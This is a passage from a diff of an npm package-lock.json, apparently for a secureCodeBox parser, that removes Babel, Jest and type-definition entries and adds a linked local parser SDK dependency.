"peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/reporters/node_modules/istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/@jest/reporters/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "dev": true, - "dependencies": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "optionalDependencies": { - "openid-client": "^5.3.0" - } - }, - "node_modules/@kubernetes/client-node/node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", - "dev": true - }, - "node_modules/@kubernetes/client-node/node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dev": true, - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" + "jsonpointer": "^5.0.1" } }, "node_modules/@securecodebox/parser-sdk-nodejs": { "resolved": "../parser-sdk/nodejs", "link": true - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" + } + }, + "dependencies": { + "@securecodebox/parser-sdk-nodejs": { + "version": "file:../parser-sdk/nodejs", + "requires": { + "@kubernetes/client-node": "^1.3.0", + "ajv": "^8.17.1", + "ajv-draft-04": "^1.0.0", + "ajv-formats": "^3.0.1", + "jsonpointer": "^5.0.1" } - }, - "node_modules/@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==", - "dev": true - }, - "node_modules/@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", - "dev": true, - "dependencies": { - "undici-types": "~6.19.2" - } - }, - "node_modules/@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "dev": true, - "dependencies": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "node_modules/@types/request/node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "dev": true, - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - 